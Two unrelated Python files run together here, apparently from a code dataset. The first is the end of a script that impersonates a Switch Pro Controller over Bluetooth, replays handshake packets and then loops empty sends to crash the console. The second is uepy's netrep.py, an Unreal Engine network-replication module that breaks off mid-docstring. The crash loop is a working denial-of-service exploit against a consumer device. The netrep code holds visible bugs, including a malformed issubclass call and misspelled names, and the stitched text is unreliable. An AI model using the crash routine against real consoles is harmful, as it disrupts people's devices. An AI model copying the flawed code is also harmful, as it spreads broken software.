b'\xA1\x21\x8D\x40\x00\x00\x00\x10\x08\x76\x44\x67\x73\x08\x90\x10\x20\x60\x00\x00\x18\x32\x00\xFA\xFE\x38\x01\x00\x40\x00\x40\x00\x40\x03\x00\xEE\xFF\xD9\xFF\x3B\x34\x3B\x34\x3B\x34\x00\x00\x00\x00\x00' ENABLE_IMU = b'\xA1\x21\xBB\x40\x00\x00\x00\x11\x08\x76\x45\x87\x73\x02\x80\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ENABLE_VIBRATION = b'\xA1\x21\xDD\x40\x00\x00\x00\x0F\x18\x76\x43\x87\x73\x09\x80\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SET_NFC_IR = b'\xA1\x21\x13\x40\x00\x00\x00\x0E\x08\x76\x45\x77\x73\x00\xA0\x21\x01\x00\xFF\x00\x03\x00\x05\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5C' SET_PLAYER_LIGHTS = b'\xA1\x21\x35\x40\x00\x00\x00\x10\x08\x76\x43\x67\x73\x0B\x80\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' IDLE_PACKET = b'\xA1\x30\xBA\x40\x00\x00\x00\x0F\xD8\x75\x43\x97\x73\x09\xD5\xFA\x3C\xFC\xCD\x0E\x19\x00\xE1\xFF\xDD\xFF\xCD\xFA\x3A\xFC\xCE\x0E\x18\x00\xDF\xFF\xDB\xFF\xCA\xFA\x3C\xFC\xD3\x0E\x19\x00\xDD\xFF\xDB\xFF' COMMANDS = [ REQUEST_INFO, SET_SHIPMENT, SERIAL_NUMBER, COLOURS, INPUT_MODE, TRIGGER_BUTTONS, FACTORY_PARAMS, FACTORY_PARAMS_2, USER_CAL, FACTORY_CAL, SIX_AXIS_CAL, ENABLE_IMU, ENABLE_VIBRATION, SET_NFC_IR, ] def format_message(data, split, name): """Formats a given byte message in hex format split into payload and subcommand sections. :param data: A series of bytes :type data: bytes :param split: The location of the payload/subcommand split :type split: integer :param name: The name featured in the start/end messages :type name: string :return: The formatted data :rtype: string """ payload = "" subcommand = "" for i in range(0, len(data)): data_byte = str(hex(data[i]))[2:].upper() if len(data_byte) < 2: data_byte = "0" + data_byte if i <= split: payload += "0x" + data_byte + " " else: subcommand += "0x" + data_byte + " " formatted = ( f"--- {name} Msg ---\n" + f"Payload: {payload}\n" + f"Subcommand: {subcommand}") return formatted def print_msg_controller(data): """Prints a formatted message from a controller :param data: The bytes from the controller message :type data: bytes """ print(format_message(data, 13, "Controller")) def print_msg_switch(data): """Prints a formatted message from a Switch :param data: The bytes from the Switch message :type data: bytes """ print(format_message(data, 10, "Switch")) if __name__ == "__main__": port_ctrl = 17 port_itr = 19 toggle_input_plugin(False) bt = BlueZ(adapter_path="/org/bluez/hci0") controller = Controller(bt, PRO_CONTROLLER) controller.setup() # Switch sockets switch_itr = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) switch_ctrl = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) try: switch_ctrl.bind((bt.address, port_ctrl)) switch_itr.bind((bt.address, port_itr)) # bt.set_alias("Joy-Con (L)") bt.set_alias("Pro Controller") bt.set_discoverable(True) print("Waiting for Switch to connect...") switch_itr.listen(1) switch_ctrl.listen(1) client_control, control_address = switch_ctrl.accept() print("Got Switch Control Client Connection") client_interrupt, interrupt_address = switch_itr.accept() print("Got Switch Interrupt Client Connection") # Creating a non-blocking client interrupt connection fcntl.fcntl(client_interrupt, fcntl.F_SETFL, os.O_NONBLOCK) print("Connecting to Switch...") while True: try: reply = client_interrupt.recv(350) # print_msg_switch(reply) except BlockingIOError: reply = None if reply and len(reply) > 40: client_interrupt.sendall(COMMANDS.pop(0)) else: client_interrupt.sendall(IDLE_PACKET) if len(COMMANDS) == 0: break time.sleep(1/15) print("Crashing Switch...") while True: try: reply = client_interrupt.recv(350) except BlockingIOError: reply = None client_interrupt.sendall(b'') time.sleep(1/15) except KeyboardInterrupt: print("Closing sockets") switch_itr.close() switch_ctrl.close() try: sys.exit(1) except SystemExit: os._exit(1) except OSError as e: print("Closing sockets") switch_itr.close() switch_ctrl.close() raise e finally: toggle_input_plugin(True)
dfb/uepy
Content/Scripts/uepy/netrep.py
''' Python side of network replication (aka NetRep or NR) code. Misc info/notes: - Any object (not just actors) can declare itself as replicated and send/receive network messages; each object that does so needs to have a unique network name/ID known as the netID. - Replicated objects declare an optional 'repProps' Bag that lists all its replicated properties and their default values. - Replicated objects have an OnReplicated method that is called once the object is fully replicated; for replicated actors, this is effectively BeginPlay (and they should generally not use BeginPlay at all). - Replicated objects can optionally declare that they depend on other replicated objects in order to function properly, in which case OnReplicated is not called until those other objects have fully replicated first. Use self.NRSetDependencies(*deps) where each dependency can be a NetReplicatd object or the name of a property on self that holds a reference to a NetReplicated object. So the host might do something like the following in its OnReplicated method: self.foo = Foo() # Foo is a NetReplicated objects self.NRSetDependencies('foo') and then on the client, when OnReplicated is called, self.foo will reference that same Foo instance, and OnReplicated will be called only after foo fully replicates. It is up to application code to avoid dependency loops. Note that these are not repProps, so they are accessible via self.x and not self.nr.x. Also note that right now the usefulness of dependencies is somewhat limited because if NR is in charge of spawning the object client side, it must support a no-args constructor call. - Replicated objects are spawned across the network in 3 different ways: - Engine - a core engine object such as gamestate or the player's pawn. Engine spawns on the host and on the client, and then we link it into the NR subsystem. Hopefully there are very few of these, but we need them because we don't yet know of a way for us to be in charge of replicating their spawn but still have them work completely with the engine's innards. Hopefully there are very few of these, because we don't have control over the order in which these get spawned on clients. - NR - any sort of game-specific replicated object. Engine spawns on the host and we link it into NR, and then send an NR message to all clients with instructions on how to spawn instances on the client and link those instances to the one on the host. - App - for replicated objects that get spawned "on their own", e.g. some replicated parts of the UI or something where the spawning of some other object causes these to be spawned (such that we don't want the engine or NR to take care of spawning them separately) but that we still want to be able to send/receive replication messages and to have state sync'd across machines. Outside of *how* the objects are spawned, replication works pretty much exactly the same in all cases. A huge amount of the complexity of this module is due to engine-spawned objects (i.e. synchronizing replicated object creation between two different replication systems) so it would be nice to eventually not need it. - In order for an object on the host and a corresponding object on a client to know they are the "same" object, both must register with NR (via self.NRRegister) in their __init__ function, using a name (aka 'netID') that is the same on both machines. The exception is for NR-spawned objects on the client: they should /not/ call NRRegister because they are registered automatically. Engine-spawned objects (such as the pawn) automatically have their engine netGUID appended to their netID (e.g. if you register with a name 'pawn' then it'll internally be registered as something like 'pawn_5') - this frees the application code from trying to figure out how to uniquely identify instances and helps avoid a chicken-and-egg problem on clients (them needing to register using a unqiue ID prior to them having any information from the host that could be used to uniquely identify themselves). So: - for engine-spawned: on host and clients call NRRegister in __init__ using a name that basically indicates the type ('vrpawn') - for NR-spawned: on host call NRRegister in __init__ with a unqiue name (e.g. myactor_234523453) - for app-spawned: on host and clients call NRRegister in __init__ using a unique name both sides know (e.g. 'mygamestate') - A common pattern when the user is directly generating replication events (e.g. moving an object around) is to send throttled, unreliable events while the user interaction is underway, and then once the user is done, send a final, reliable, and unthrottled event so that everyone has the correct final value. In order to make this work (and because UE4 sends messages over UDP), application code needs to call NRStartMixedReliability once before the first intermediate/unreliable message goes out. - Non-Actor replicated objects should call self.NRUnregister() when they are being destroyed. TODO: - with a lot of the binary data handling, we make unnecessary copies of the data - it'd be better to use byte arrays / memoryviews (or at the very least, struct.unpack_from) - figure out some way to do creation of dependent child objects that take init parameters. - splitting data marshalling into format type codes and encoded data blob has a low ROI. It would be better to keep the two merged. We probably want it for array supoort anyway. - for everything except object refs, self.nr.pre_<name> to get the value from before the change? (and with obj refs, we just don't want to keep objs alive, so it could be a weak ref in that case) - for data type codes, use an enum instead of a char, and then use a set high bit to mean "array" and add support for replicating arrays. - probably ok to limit max len to 255 - probably /not/ ok to require all same type (think lists with None, but maybe that's the only exception?) - the diff format could be something like <1B:action:add/update/remove><1B:index>[for add/update: <1B:datatype><1B marshalled value>] - NRUpdate could detect the changes only if the caller doesn't modify the array exactly, e.g. foo = self.nr.foo foo.append(x) self.NRUpdate(foo=foo) wouldn't detect any changes, so we'd need to always use 'foo = self.nr.foo[:]' - maybe that's not too big a deal to require that? - maybe we should instead (or additionally) support ways to tell NRUpdate the modification we want to make, e.g. self.NRUpdate(foo__append=x) self.NRUpdate(foo__pop=2) self.NRUpdate(foo__remove=x) self.NRUpdate(foo=[1,2,3]) # still allow this, but doesn't try to diff and unconditionally resends all we don't need to support every possible use of arrays; instead focus on likely/recommended uses of replicated arrays - once you support arrays, might as well add support for dictionaries and sets! (and the var__action=X form would work well for them) - when the host leaves, the clients don't clean up all the host-spawned objects (not really sure if they should or what) ''' from uepy import * from uepy.enums import * import struct, weakref, time, random, inspect class ENRBridgeMessage(Enum): NONE, SigDef, SetChannelInfo, ObjInitialState, Call, Unregister = range(6) class SignatureDefinitionManager: '''Helper for managing "signature definitions", which are simply mappings between strings and uint16 IDs. In a nutshell, there are a lot of strings we would send over the wire many times for a given application, so we instead map those strings to IDs and send the IDs instead. What makes it interesting/tricky is that we don't know the set of strings until they are about to be sent. SigDefs are to address the following problem: - we don't want to force developers to declare up front every network API call and the combination of all parameter types that might be used - we also don't want to constantly transmit type information since it's a lot of overhead In theory the set of strings the might be sent is "infinite" (for example, for strings representing type information for function call parameters), but in practice and for a given application, the set of strings used is actually relatively small - there are only so many method names and parameter type info combinations that an application will use. Because sigdefs are completely dynamic (they don't exist until the moment a mappable string is about to be sent over the wire), they are not only shared across channels, there are not even shared across directions on the same channel, so each channel has a set of sigdefs for sending as well as receiving.''' def __init__(self, channel): self.channel = channel # so we can send out the new mappings as they get created self.s2n = {} # string -> numerical ID self.n2s = {} # numerical ID -> string def Set(self, n, s): '''Used by channels when they receive a signature definition from the other side''' self.s2n[s] = n self.n2s[n] = s def IDForString(self, s): '''Given some string, returns an ID for it, creating it if needed.''' n = self.s2n.get(s) if n is None: # Create a new entry n = len(self.s2n) self.s2n[s] = n self.n2s[n] = s payload = struct.pack('<BH', ENRBridgeMessage.SigDef, n) + s.encode('utf8') self.channel.AddMessage(payload, True) return n def StringForID(self, n): '''Inverse of IDForString. Raises KeyError if not found, though that should never happen.''' return self.n2s[n] @staticmethod def CreateFor(channel): channel.recvSigDefs = SignatureDefinitionManager(channel) channel.sendSigDefs = SignatureDefinitionManager(channel) class NRAppBridge: '''Connects Python code to the netrep C++ code so that Python code can send NR messages and so that incoming messages can be routed to Python. On the C++ side is NRChannel, which is basically a socket - it sends and receives messages between two endpoints, without an understanding of what the data means.''' # Note: this code has both netIDs (strings) and netIDNums (uint32s). All code outside of this class uses the former, # while over the wire and internally in some places (for efficiency) we use the latter. def __init__(self): self.ChannelIDChanged = Event() # fires (newchannelID) when it gets assigned on a client self.ClientJoined = Event() # fires (clientChannelID) when a connection is added self.Reset() def Reset(self): self.isHost = True # True until we learn otherwise (currently we don't get recreated when a client joins a host, so we detect dynamically) self.channelID = 0 # aka playerID or userID self.hostChannel = None # on clients, the UNRChannel to the host self.clientChannels = {} # on the host, all channels to connected clients, channelID -> UNRChannel instance self.lastCallTimes = {} # sigDefStr -> timestamp of last time we issued a remote call for it self.nextNetIDNum = 1 # the next net ID number we'll assign in a Register call. Only used on the host self.netIDToNum = {} # netID name --> numerical ID (a uint32) - nobody outside of the AppBridge knows/cares about numerical ID mapping self.numToNetID = {} # inverse of netIDToNum self.objs = {} # netID -> weakref to instance; we don't use netIDNum here because clients may register objects by netID prior to getting the netIDNum from the server self.dependencyWaiters = {} # netIDNum -> [list of (netIDNum waiting on it, attrName to use when assigning it to the waiter or '')] self.unconsumedState = {} # netIDNum -> Bag(.propValues, .dependencies) of replication state we've received but not yet "delivered" self.waitingForNetIDNum = {} # on clients, netID -> obj instance that has registered but the mapping has not yet arrived from the server self.deferredCalls = {} # unknown netIDNum -> [list of tuples of args for calling _ExecuteLocalCall for calls being held until the recipient replicates] def Register(self, obj, netID, spawnType:ENRSpawnReplicatedBy): '''Called by NetReplicated.NRRegister''' # For engine-wrapped objects, also adjust replication settings if hasattr(obj, 'engineObj'): e = obj.engineObj e.bAlwaysRelevant = True # we don't want the engine to do any relevancy checking e.SetReplicateMovement(False) # we never want this e.SetReplicates(spawnType == ENRSpawnReplicatedBy.Engine) # from the engine's perspective, it's a replicated actor only if the engine spawns it obj.nrSpawnType = spawnType if spawnType == ENRSpawnReplicatedBy.Engine: # For engine-spawned objects, on the host we auto-append their engine-assigned netGUID to give # them a unique name (without this, it becomes really difficult for app code to communicate in time # a unique name to client instances - they need to know a unique name prior to them knowing how to # come up with it. if self.isHost or hasattr(obj, '_nrDeferredNetID'): # if it does have this prop, it means BeginPlay is happening netGUID = GetOrAssignNetGUID(obj.GetWorld(), obj.engineObj) netID += '_%d' % netGUID else: # On clients, it's too early to ask the engine for the netGUID, so all we do for now is save the netID # for later auto-registration in BeginPlay. obj._nrDeferredNetID = netID return # NOTE: if we add more steps here that are relevant to instances on clients, be sure to update _OnBridgeMessage_ObjInitialState accordingly if self.isHost: # Allocate a new netIDNum num = self.nextNetIDNum self.nextNetIDNum += 1 self.netIDToNum[netID] = num self.numToNetID[num] = netID # Remember this object, and also set a few data members on it self.objs[netID] = weakref.ref(obj) obj.nrNetID = netID if spawnType == ENRSpawnReplicatedBy.App: obj._NRCheckStart() # otherwise, on the host, non-Actor subclasses will never call this def Unregister(self, *, netID=None, netIDNum=None): '''Flags this object as going away. When called on the host, causes a message to be sent to all clients to also unregister it.''' if netID is not None: netIDNum = self.netIDToNum[netID] elif netIDNum is not None: netID = self.numToNetID[netIDNum] else: assert 0 # gotta supply one or the other if self.isHost: # Notify all clients that this object is unregistering payload = struct.pack('<BI', ENRBridgeMessage.Unregister, netIDNum) for chan in self.clientChannels.values(): chan.AddMessage(payload, True) # Forget everything about this object self.netIDToNum.pop(netID, None) self.numToNetID.pop(netIDNum, None) self.dependencyWaiters.pop(netIDNum, None) self.unconsumedState.pop(netIDNum, None) self.waitingForNetIDNum.pop(netID, None) ref = self.objs.pop(netID, None) # On clients, we need to kill off objects that are Actor subclasses that were not spawned by the engine if ref and not self.isHost: obj = ref() if obj and obj.nrSpawnType != ENRSpawnReplicatedBy.Engine: klass = obj.__class__ if issubclass(klass, AActor) or issubclass(AActor_PGLUE) or issubclass(type(klass), PyGlueMetaclass): obj.Destroy() def _OnBridgeMessage_Unregister(self, chan, payload): nrNetIDNum = struct.unpack('<I', payload) self.Unregister(netIDNum=nrNetIDNum) def OnMessage(self, chan, data): '''Called by NRChannel for each incoming message. Routes the message to internal handlers''' handlerName = '_OnBridgeMessage_%s' % ENRBridgeMessage.NameFor(data[0]) # all msgs have a ENRBridgeMessage value as the first byte getattr(self, handlerName)(chan, data[1:]) def SendInitialStateFor(self, obj, chan=None): '''Called on the host by all NetReplicated objects once they finish spawning (i.e. after returning from their OnReplicated call). If chan is not None, the state is sent to a specific channel (for a late joining player), otherwise it is sent to all channels.''' assert self.isHost, obj if chan is None: channels = self.clientChannels.values() else: channels = [chan] if not channels: return # happens on host when stuff is spawned but there are no clients yet # Build up the message payload - if we add any more messages this convoluted, we should probably write/get a helper lib parts = [] ; PA = parts.append # message type, spawn type, net ID num, and net ID len+data (so client can recreate the mapping) netIDNum = self.netIDToNum[obj.nrNetID] PA(struct.pack('<BBIB', ENRBridgeMessage.ObjInitialState, obj.nrSpawnType, netIDNum, len(obj.nrNetID))) PA(obj.nrNetID.encode('utf8')) # Create an ordered list of repProp values - no need for naming them since the receiving side knows the same prop ordering # send the format string for repprops (len+str) and the blob of data (len+data) for it formatStr, propsBlob = ValuesToBin([obj.nr[k] for k in obj.nrPropNames]) PA(struct.pack('<BH', len(formatStr), len(propsBlob))) PA(formatStr.encode('utf8')) PA(propsBlob) # Add info about replicated objects this object depends on. The format is super cheesy, but easy to debug, and often not as # inefficient as it looks since netIDs are 4 bytes but rarely that many digits, especially in hex deps = [] # list of strings in the form '<netID>:<attrName or emptystr>' for netID, attrName in obj.nrDependencies: netIDNum = self.netIDToNum[netID] deps.append('%X:%s' % (netIDNum, attrName)) depsStr = '|'.join(deps) PA(struct.pack('<H', len(depsStr))) PA(depsStr.encode('utf8')) # If the objet is NR-spawned, we also need to include its class name so that the client knows what to spawn if obj.nrSpawnType == ENRSpawnReplicatedBy.NR: className = obj.__class__.__name__ PA(struct.pack('<B', len(className))) PA(className.encode('utf8')) # Send it! payload = b''.join(parts) for chan in channels: chan.AddMessage(payload, True) def OnChannelFromClient(self, chan): '''Called on the host when a channel to a client is connecting to us''' # Generate a unique ID for this new channel. This ID can be used as a player/user ID, so there are advantages to # keeping this number low, so scan for the next available channel ID as opposed to just using a counter. usedIDs = self.clientChannels.keys() chanID = 1 # by convention, the host is always player 0, so clients are all >= 1 while 1: if chanID in usedIDs: chanID += 1 else: break chan.channelID = chanID SignatureDefinitionManager.CreateFor(chan) self.clientChannels[chanID] = chan # Sync state with the client by informing it of its channel ID and the state of all active replicated objects chan.AddMessage(struct.pack('<BB', ENRBridgeMessage.SetChannelInfo, chanID), True) allObjs = [] for netID, objRef in self.objs.items(): obj = objRef() if obj: netIDNum = self.netIDToNum[obj.nrNetID] allObjs.append((netIDNum, obj)) for netIDNum, obj in sorted(allObjs): # sorted so info gets sent in creation order self.SendInitialStateFor(obj, chan) self.ClientJoined.Fire(chanID) def OnChannelToHost(self, chan): '''Called by NRChannel when as a client we have connected to the host''' self.isHost = False # oh, hey, it turns out we're not the host after all SignatureDefinitionManager.CreateFor(chan) self.hostChannel = chan def OnChannelClosing(self, chan): '''Called by NRChannel when it is closing''' if self.isHost: self.clientChannels.pop(chan.channelID, None) else: # We are disconnecting, so now we are the host again (because we are now standalone), so we need to reset self.Reset() def DoCall(self, recipient, where, methodName, args, reliable, maxCallsPerSec): '''Used by NetReplicated to carry out the call logic''' if where == ENRWhere.NONE: log('WARNING: NRCall to nowhere', recipient, methodName, args) return channels = set() # channels that will receive the message outboundWhere = ENRWhere.NONE # If we do make a remote call, the 'where' value to send in that call runLocal = False if self.isHost: # When called on the host, the valid outcomes are a combination of running locally, telling all channels to run # locally, telling one specific channel to run locally. if where & ENRWhere.USER: chanID = where - ENRWhere.USER if chanID == self.channelID: runLocal = True # caller wants it to run on a specific user, and the host is that user else: chan = self.clientChannels.get(chanID) if chan: channels.add(chan) outboundWhere |= ENRWhere.Local else: if where & ENRWhere.Local: runLocal = True if where & ENRWhere.Host: runLocal = True # cuz we are the host if where & ENRWhere.NotMe: channels.update(self.clientChannels.values()) outboundWhere |= ENRWhere.Local else: # When called on a client, the valid outcomes are a combination of running locally, telling the host to run # locally, telling the host to tell all channels (minus this one) to run locally, or telling the host to tell # one specific channel to run locally. callHost = False if where & ENRWhere.USER: chanID = where - ENRWhere.USER if chanID == self.channelID: runLocal = True # caller wants it to run on a specific user, and we are that user else: callHost = True outboundWhere = where # stomp any prior values and set it to userID + user bit else: if where & ENRWhere.Local: runLocal = True if where & ENRWhere.Host: callHost = True outboundWhere |= ENRWhere.Local if where & ENRWhere.NotMe: callHost = True outboundWhere |= ENRWhere.All # the receiving side knows this should not include our channel since we're the caller if callHost: channels.add(self.hostChannel) # Make any remote calls if channels: recipientID = self.netIDToNum[recipient.nrNetID] formatStr, blob = ValuesToBin(args) fullSig = methodName + '|' + formatStr sendMessage = True if maxCallsPerSec > 0: # Caller wants throttling of remote calls enabled so as to not flood the network (local calls are # never throttled though). Right now the throttling is pretty blunt and simply doesn't allow two # calls to the same signature (method name + arg types) to happen within a timeframe that exceeds # the overall rate, but if needed we could add something a bit smarter that e.g. allows some fast # back-to-back calls as long as they don't exceed some number per second overall. now = time.time() lastCall = self.lastCallTimes.get(fullSig, 0) nextAllowedTime = lastCall + 1.0/maxCallsPerSec if now < nextAllowedTime: sendMessage = False else: self.lastCallTimes[fullSig] = now if sendMessage: mixedSessionID = recipient.NRGetMixedReliabilitySessionID(methodName, reliable) for chan in channels: sigDefID = chan.sendSigDefs.IDForString(fullSig) payload = struct.pack('<BBHIBB', ENRBridgeMessage.Call, outboundWhere, sigDefID, recipientID, mixedSessionID, reliable) + blob chan.AddMessage(payload, reliable) # (Yes, we really do want to pass reliable as a parameter to send in the call and also as a parameter *to* _Send) # Call locally - we do this after any remote calls so that if the local call triggers more NR calls, they will also # be sent to the remote machines in the same order if runLocal: self._DoLocalCall(recipient, methodName, args) def _OnBridgeMessage_SigDef(self, chan, payload): ''''Called when we receive a sigdef from the other side of the channel''' sigDefID = struct.unpack('<H', payload[:2])[0] sigDef = str(payload[2:], 'utf8') chan.recvSigDefs.Set(sigDefID, sigDef) def _OnBridgeMessage_SetChannelInfo(self, chan, payload): '''Called on client to inform it of its channel/player/user ID''' assert not self.isHost self.channelID = payload[0] self.ChannelIDChanged.Fire(self.channelID) def _OnBridgeMessage_ObjInitialState(self, chan, payload): '''Called on client to replicate the initial state of an actor. If the object is NR-spawned, also causes the object to be spawned.''' # Parse this mess in the least efficient way possible spawnType, netIDNum, netIDLen = struct.unpack('<BIB', payload[:6]) payload = payload[6:] netID = str(payload[:netIDLen], 'utf8') payload = payload[netIDLen:] formatStrLen, propsBlobLen = struct.unpack('<BH', payload[:3]) payload = payload[3:] formatStr = str(payload[:formatStrLen], 'utf8') payload = payload[formatStrLen:] propsBlob = payload[:propsBlobLen] payload = payload[propsBlobLen:] depsStrLen = struct.unpack('<H', payload[:2])[0] payload = payload[2:] depsStr = str(payload[:depsStrLen], 'utf8') payload = payload[depsStrLen:] deps = [] if depsStr: for dep in depsStr.split('|'): depNetIDNum, attrName = dep.split(':') depNetID = self.numToNetID[int(depNetIDNum, 16)] deps.append((depNetID, attrName)) className = None if spawnType == ENRSpawnReplicatedBy.NR: classNameLen = payload[0] className = str(payload[1:classNameLen+1], 'utf8') payload = payload[1+classNameLen:] # Set up the same mapping the host has for this object self.netIDToNum[netID] = netIDNum self.numToNetID[netIDNum] = netID # Save the state and dependency information so it can later be attached to the actors propValues = BinToValues(formatStr, propsBlob) self.unconsumedState[netIDNum] = Bag(propValues=propValues, dependencies=deps) obj = None if className is not None: # It's an NR-spawned object, so spawn it now. It doesn't necessarily know its own netID, so # we take care of registration on its behalf. klass = NRTrackerMetaclass.All.get(className) assert klass, 'Unable to find class to spawn: ' + className if issubclass(klass, AActor) or issubclass(klass, AActor_PGLUE) or issubclass(type(klass), PyGlueMetaclass): # If it's an engine class of one of the Python quasi-subclasses of an engine class, we need to use # an engine API to spawn it (though I guess SpawnActor wouldn't work for U-subclasses) obj = SpawnActor(GetWorld(), klass) else: obj = klass() obj.nrNetID = netID obj.nrSpawnType = spawnType self.objs[netID] = weakref.ref(obj) else: ref = self.objs.get(netID) if ref: obj = ref() # If we know about the object (either because we just spawned it above, or because it already registered itself), trigger it # to consume its initial state. If we don't know about the obj in question, it just means that at some point it'll show up # and it will call checkstart on its own. if obj: obj._NRCheckStart() def _OnBridgeMessage_Call(self, senderChannel, payload): '''The receiving side of a NetReplicated.NRCall -> bridge.DoCall sequence. Runs it locally and/or passes it on to other clients.''' where, sigDefID, recipientID, mixedSessionID, reliable = struct.unpack('<BHIBB', payload[:9]) blob = payload[9:] runLocal = False sigDef = senderChannel.recvSigDefs.StringForID(sigDefID) if self.isHost: # When a message is received on the host, valid outcomes are to run it locally, to forward it on to all channels # except for the one that sent the message, or to forward it on to one specific channel channels = [] # Channels we'll forward the message to if where & ENRWhere.USER: chanID = where - EWhere.USER if chanID == self.channelID: runLocal = True else: # The requested channel is some other machine, so forward it on chan = self.clientChannels.get(chanID) if chan: channels.append(chan) else: if where & ENRWhere.Local: runLocal = True if where == ENRWhere.All: # forward it to all clients *except* the caller senderID = senderChannel.channelID for chanID, chan in self.clientChannels.items(): if chanID != senderID: channels.append(chan) # Tell the channels we're forwarding to to run it locally for chan in channels: sigDefID = chan.sendSigDefs.IDForString(sigDef) payload = struct.pack('<BBHIBB', ENRBridgeMessage.Call, ENRWhere.Local, sigDefID, recipientID, mixedSessionID, reliable) + blob # we include 'reliable' here only cuz the msg format wants it chan.AddMessage(payload, reliable) else: # When a message is received on a client, the only valid scenario is a command to run it locally if where != ENRWhere.Local: log('ERROR: client received a remote call with a non-local destination:', where) else: runLocal = True if runLocal: # Find the recipient and call it, if it is known. If it is an unknown recipient, we assume the call is for an object # that will be replicated soon, so we'll add it to a list of calls to delay until then. recipientNetID = self.numToNetID.get(recipientID) if recipientNetID is None: if self.isHost: # No point in deferring the call - we are the host, so maybe it's just a late call for a recently-deceased obj? log('ERROR: ignoring local call to unknown recipient', recipientID) else: # Defer the call til later log('Deferring call to', recipientID, sigDef) self.deferredCalls.setdefault(recipientID, []).append((recipientID, sigDef, mixedSessionID, reliable, bytes(blob))) else: self._ExecuteLocalCall(recipientID, sigDef, mixedSessionID, reliable, blob) def _ExecuteLocalCall(self, recipientID, sigDef, mixedSessionID, reliable, blob): '''Helper used for running local function calls - broken out from _OnBridgeMessage_Call because we need to sometimes defer function calls until after an object has fully replicated. And yes, it is annoying that we have both this and _DoLocalCall.''' recipientNetID = self.numToNetID.get(recipientID) ref = self.objs.get(recipientNetID) if not ref: log('ERROR: non-existent recipient', recipientID, recipientNetID, sigDef) else: obj = ref() if obj: methodName, formatStr = sigDef.split('|') # If a mixed reliability session is active, drop any messages that don't conform, as it indicates they # are out of order/delayed messages that should be ignored if mixedSessionID != 0: expectedID = obj.NRGetMixedReliabilitySessionID(methodName, reliable) if expectedID != mixedSessionID: log('Tossing late mixed mode message for', obj, methodName, '(expected session %d, got %d, reliable:%s)' % expectedID, mixedSessionID, reliable) return args = BinToValues(formatStr, blob) self._DoLocalCall(obj, methodName, args) def _DoLocalCall(self, obj, methodName, args): '''Helper for dispatching an NRCall to a NetReplicated object''' method = getattr(obj, methodName, None) if method is None: log('ERROR: NRCall to', obj, 'but it has no method named', methodName) else: try: method(*args) except: logTB() def NoteObjectReplicated(self, obj): '''Called by NetReplicated._NRCheckStart once it has fully replicated on a client. Executes any differed calls, and also informs any objects waiting on this object to replicate that that dependency has been met.''' # Execute any NRCalls that arrived prior to the object being fully replicated netIDNum = self.netIDToNum[obj.nrNetID] for args in self.deferredCalls.pop(netIDNum, []): self._ExecuteLocalCall(*args) # Find all other objects that have been waiting on this object to finish replicating for waiterNetIDNum, attrName in self.dependencyWaiters.pop(netIDNum, []): waiterNetID = self.numToNetID[waiterNetIDNum] waiterRef = self.objs.get(waiterNetID) if waiterRef: waiterObj = waiterRef() if waiterObj: try: waiterObj.nrWaitingDependencies.remove(obj.nrNetID) except ValueError: pass # shouldn't happen but... if attrName: # The waiting object wants a ref of the newly-replicated object stored on it setattr(waiterObj, attrName, obj) if not waiterObj.nrWaitingDependencies: # This object is no longer waiting for any dependencies, so trigger it to possibly finish its own replication now waiterObj._NRCheckStart() def TryConsumeInitialState(self, obj): '''Called on clients by an object's _NRCheckStart as it tries to complete replication. If initial state for the object has been received (via _OnBridgeMessage_ObjInitialState), applies it and returns True, indicating that it can proceed with other initialization steps. Otherwise, returns False, indicating it should try again later. If state is found, the objects repProp values are updated accordingly, and the object's dependency information is set up.''' netIDNum = self.netIDToNum.get(obj.nrNetID) if netIDNum is None: # We don't even have a mapping for this object yet return False # try again later! state = self.unconsumedState.pop(netIDNum, None) if state is None: return False # try again later! # We have this object's state, so set its repProp values - we received just an ordered list of values since we know # the property names already. for propName, propValue in zip(obj.nrPropNames, state.propValues): setattr(obj.nr, propName, propValue) # Also resolve or set up tracking of any replicated objects this object depends on waitingFor = [] # netIDs of objs that have not yet arrived for depNetID, attrName in state.dependencies: # See if the object exists and is fully replicated already depNetIDNum = self.netIDToNum.get(depNetID) if depNetIDNum is not None: ref = self.objs.get(depNetID) if ref: depObj = ref() if depObj and depObj.nrOnReplicatedCalled: # Yay, this object has already fully replicated if attrName: setattr(obj, attrName, depeObj) # this object wants a named reference to that other object continue # Either the object doesn't exist yet or it does but it too is still replicating, so we'll wait to list this # object as waiting on it waitingFor.append(depNetID) self.dependencyWaiters.setdefault(depNetIDNum, []).append((netIDNum, attrName)) obj.nrWaitingDependencies = waitingFor return True # you've got your state info, so quit nagging us about it def NetIDNumFromObject(self, obj): '''Helper for marshalling - given a replicated object, return its netID number''' netID = getattr(obj, 'nrNetID', None) assert netID is not None, 'NetIDNumFromObject called on unreplicated object ' + repr(obj) return self.netIDToNum[netID] def ObjectFromNetIDNum(self, netIDNum): '''Inverse of the above; returns None if the object can't be found''' netID = self.numToNetID.get(netIDNum) if netID is None: log('ERROR: bridge failed to find netID for', netIDNum) return None ref = self.objs.get(netID) if ref is None: log('ERROR: bridge failed to find object for', netIDNum, netID) return None return ref() _bridge = NRAppBridge() UNRChannel.SetAppBridge(_bridge) def GetUserID(): '''Public API used by __init__''' return _bridge.channelID class NRWrappedDefault: '''Used for repProps where the application code needs additional annotation information - apps can create custom subclasses instead of providing "bare" default values; NR will just take the .defaultValue member as the default. For example: class Config(NRWrappedDefault): pass repProps = Bag(foo=Config(0), bar=3)''' def __init__(self, defaultValue): self.defaultValue = defaultValue class NetReplicated(metaclass=NRTrackerMetaclass): '''Mixin class to add to any class (doesn't have to be an actor) that wants to use network replication''' # subclasses should declare their own repProps Bag, where each key is the property name (it will later be # available in self.nr.<that name> and the value is 